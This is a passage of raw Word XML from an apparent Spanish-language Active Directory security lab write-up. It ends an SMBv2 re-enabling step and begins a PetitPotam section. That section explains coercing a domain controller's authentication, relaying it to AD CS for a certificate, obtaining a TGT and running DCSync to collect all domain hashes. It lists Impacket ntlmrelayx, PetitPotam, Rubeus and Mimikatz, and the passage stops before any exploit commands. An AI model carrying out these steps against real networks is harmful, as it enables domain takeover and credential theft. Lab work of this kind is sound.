    <w:p w14:paraId="19647A4F" w14:textId="35467D9C" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora activaremos SMBv2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B0A92" w14:textId="4F824E3E" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75236D1E" w14:textId="5500800E" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251758592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="678F1738" wp14:editId="0F3D89A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2153</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="104140" b="80010"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="145272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24A15829" w14:textId="5181C9A9" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="004B68F4">
                            <w:r w:rsidRPr="004B68F4">
                              <w:t>Set-SmbServerConfiguration -EnableSMB2Protocol $true</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="485379F6" w14:textId="31BD2CF6" w:rsidR="004B68F4" w:rsidRPr="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="004B68F4">
                            <w:r w:rsidRPr="004B68F4">
                              <w:t>Get-SmbServerConfiguration | Select EnableSMB2Protoc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8F1738" id="_x0000_s1045" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:.15pt;width:185.9pt;height:110.6pt;z-index:2517585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24A15829" w14:textId="5181C9A9" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="004B68F4">
                      <w:r w:rsidRPr="004B68F4">
                        <w:t>Set-SmbServerConfiguration -EnableSMB2Protocol $true</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="485379F6" w14:textId="31BD2CF6" w:rsidR="004B68F4" w:rsidRPr="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="004B68F4">
                      <w:r w:rsidRPr="004B68F4">
                        <w:t>Get-SmbServerConfiguration | Select EnableSMB2Protocol</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EA376" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB4E6AC" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C682B1" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDB7658" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62228D0B" w14:textId="04F53436" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE0BB02" wp14:editId="05EF28D3">
            <wp:extent cx="6645910" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="55964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43278"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1141095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42475E" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE372DA" w14:textId="66DD430E" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Con esto quedaría activado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849636E" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="00A71BD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593FF2A3" w14:textId="254FCB7E" w:rsidR="00E711D2" w:rsidRDefault="007A5804" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Hay</w:t>
      </w:r>
      <w:r w:rsidR="00011262">
        <w:t xml:space="preserve"> que tener </w:t>
      </w:r>
      <w:r w:rsidR="00386103">
        <w:t>él</w:t>
      </w:r>
      <w:r w:rsidR="00011262">
        <w:t xml:space="preserve"> cuenta que las reglas generales explicadas después de las POC, serían </w:t>
      </w:r>
      <w:r>
        <w:t>también</w:t>
      </w:r>
      <w:r w:rsidR="00011262">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B36C2E">
        <w:t>válidas</w:t>
      </w:r>
      <w:r w:rsidR="00011262">
        <w:t xml:space="preserve"> para impedir no este ataque en concreto pero si la explotación posterior, </w:t>
      </w:r>
      <w:r w:rsidR="00217B59">
        <w:t xml:space="preserve">además las reglas aplicadas para mitigar PetitPotam también serán </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>válidas</w:t>
      </w:r>
      <w:r w:rsidR="00217B59">
        <w:t xml:space="preserve"> para este ataque y viceversa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A587159" w14:textId="77777777" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077DEDB3" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0554513A" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8F073D" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5D7DEB" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1923796D" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783DAF47" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781E379C" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043BBAA9" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F97C37C" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245531EE" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B4FE72" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213A657F" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D52AC9E" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647E2186" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED2D358" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDCEF85" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC67A8C" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A2C6BB" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D055A0A" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDE18E8" w14:textId="77777777" w:rsidR="004B68F4" w:rsidRDefault="004B68F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066383A7" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A53ACD" w14:textId="77777777" w:rsidR="007E3647" w:rsidRDefault="007E3647" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AF8FB2" w14:textId="06634C71" w:rsidR="007E3647" w:rsidRDefault="007E3647" w:rsidP="007E3647">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc135575988"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Petitpotam (</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3647">
        <w:rPr>
          <w:rStyle w:val="Carcterdecontenido"/>
        </w:rPr>
        <w:t>MS-EFSRPC</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="73A7611F" w14:textId="77777777" w:rsidR="00623839" w:rsidRDefault="00623839" w:rsidP="00623839"/>
    <w:p w14:paraId="7745D785" w14:textId="78ECB5F2" w:rsidR="00623839" w:rsidRPr="00203209" w:rsidRDefault="00623839" w:rsidP="00623839">
      <w:r>
        <w:t>El objetivo de este ataque será conseguir todos los hashes NTLM de los usuarios del dominio google.local, igual que en el ataque anterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6AB53" w14:textId="77777777" w:rsidR="00623839" w:rsidRDefault="00623839" w:rsidP="007E3647"/>
    <w:p w14:paraId="122E1B47" w14:textId="28A1276C" w:rsidR="007E3647" w:rsidRPr="007E3647" w:rsidRDefault="007E3647" w:rsidP="007E3647">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Petitpotam es una vulnerabilidad que permite a un usuario de dominio hacerse cargo de los co</w:t>
      </w:r>
      <w:r w:rsidR="00E711D2">
        <w:t>ntroladores</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de dominio mediante la activación de autentificaciones mediante el protocolo </w:t>
      </w:r>
      <w:r w:rsidRPr="007E3647">
        <w:rPr>
          <w:rStyle w:val="Carcterdecontenido"/>
        </w:rPr>
        <w:t>MS-EFSRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C6C1B" w14:textId="77777777" w:rsidR="007E3647" w:rsidRDefault="007E3647" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC89632" w14:textId="5F97FA05" w:rsidR="000D35E1" w:rsidRDefault="002F4475" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La vulnerabilidad radica en las verificaciones de ruta insuficientes en la función </w:t>
      </w:r>
      <w:r w:rsidRPr="002F4475">
        <w:t>EfsRpcOpenFileRaw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la API EFSRPC que permite a un atacante pasar cualquier valor en su parámetro filen, como la dirección IP de un atacante, para forzar su autentificación de los hosts objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC26EE3" w14:textId="77777777" w:rsidR="002F4475" w:rsidRDefault="002F4475" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170374E1" w14:textId="1149D84E" w:rsidR="003B2FCA" w:rsidRDefault="002F4475" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para que una </w:t>
      </w:r>
      <w:r w:rsidR="003B2FCA">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003B2FCA">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cante se haga cargo del controlador de dominio debe usar esta vulnerabilidad con un ataque de retransmisión NTML para capturar los hash o certificados necesarios. Los grandes objetivos de este ataque son los servidores </w:t>
      </w:r>
      <w:r w:rsidR="003B2FCA">
        <w:t>configurados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para aceptar autentificaciones NTLM, como los Servicios de certificados de Active Directory (AC DS)</w:t>
      </w:r>
      <w:r w:rsidR="003B2FCA">
        <w:t>, cuando  se instalan las funciones de inscripción web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393B08F" w14:textId="77777777" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050E120F" w14:textId="4DFD4AF3" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un escenario de ataque típico sería obligar al controlador de dominio a autentificarse en la máquina atacante que </w:t>
      </w:r>
      <w:r w:rsidR="00E711D2">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> configurada con una retransmisión NTLM. Luego, la autentificación se transmite a la autoridad de certificación CA para solicitar un certificado. Cuando se genera el certificado para el controlador de dominio, el atacante lo captura con una retransmisión NTLM y lo usa para suplantar la cuan</w:t>
      </w:r>
      <w:r w:rsidR="00E711D2">
        <w:t>ta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de administrador del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA2A71" w14:textId="77777777" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF3857F" w14:textId="2319825C" w:rsidR="003B2FCA" w:rsidRDefault="003B2FCA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El certificado se puede usar para generar un vale TGT y autentificarse en el controlador del dominio sin credenciales. Además, el </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>atacante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> puede expandir su superficie de ataque para realizar otros ataques como DCSync y recuperar todos los hash del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42874910" w14:textId="77777777" w:rsidR="000D35E1" w:rsidRDefault="000D35E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345006A1" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159673D0" w14:textId="363D1877" w:rsidR="00AE4AB2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Herramientas usadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0758EA" w14:textId="77777777" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8FCFBE" w14:textId="181F0BA8" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="00E711D2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NTLMRelayx de Impacket, </w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidRPr="00E711D2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29397D89" w14:textId="2E22EED1" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="00E711D2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PetitPotam, </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidRPr="00E711D2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19458138" w14:textId="3860D124" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="00E711D2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Rubeus, </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00E711D2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407E006" w14:textId="26C19C7B" w:rsidR="00E711D2" w:rsidRDefault="00E711D2" w:rsidP="00E711D2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mimicatz, </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidRPr="00E711D2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidRPr="00E711D2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B20456" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DADCB3A" w14:textId="7A1C156D" w:rsidR="00AE4AB2" w:rsidRDefault="006B1080" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que haremos es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17355A41" w14:textId="77777777" w:rsidR="006B1080" w:rsidRDefault="006B1080" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C977566" w14:textId="79748C82" w:rsidR="006B1080" w:rsidRDefault="006B1080" w:rsidP="00FF09DB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obligar a la máquina controlador de dominio</w:t>
      </w:r>
      <w:r w:rsidR="00FF09DB">
        <w:t xml:space="preserve"> a autentificarse en nuestra máquina atacante usando el exploit de PetitPotam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E0CF8" w14:textId="2C181C57" w:rsidR="00FF09DB" w:rsidRDefault="00FF09DB" w:rsidP="00FF09DB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transmitir la autentificación a la autoridad de certificación para solicitar un certificado para el controlador de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA71D4" w14:textId="19AA915E" w:rsidR="00FF09DB" w:rsidRDefault="00FF09DB" w:rsidP="00FF09DB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capturar el </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>tráfico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generado en el relé NTLM que configuramos en la máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E79569" w14:textId="20E55C91" w:rsidR="00FF09DB" w:rsidRDefault="00FF09DB" w:rsidP="00FF09DB">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilizar el certificado para solicitar un ticket TGT para la escalada den el dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417F3B4" w14:textId="77777777" w:rsidR="004F40E2" w:rsidRDefault="004F40E2" w:rsidP="004F40E2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F15FF59" w14:textId="242697CC" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="004F40E2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para esta ataque invertiré las máquinas, ahora el que hará de servidor de certificados será la máquina 192.168.1.80 y la máquina que se nos va autentificar la 192.18.1.79.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE0A7F" w14:textId="77777777" w:rsidR="004F40E2" w:rsidRDefault="004F40E2" w:rsidP="004F40E2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A748E9F" w14:textId="57520958" w:rsidR="004F40E2" w:rsidRDefault="004F40E2" w:rsidP="004F40E2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo primero que vamos a hacer e configurar el relé NTLM con el script de NTLMrelax de Impacket, para configurarlo tendremos que saber </w:t>
      </w:r>
      <w:r w:rsidR="001F5D84">
        <w:t>cuál</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es el sitio web para generar certificados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114A27D" w14:textId="77777777" w:rsidR="00FF09DB" w:rsidRDefault="00FF09DB" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D26CD3" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0D1AE8" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798056A3" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551C59EE" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59103C15" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4C7257" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305D3B91" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6776DE25" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509925CE" w14:textId="77777777" w:rsidR="00AE4AB2" w:rsidRDefault="00AE4AB2" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
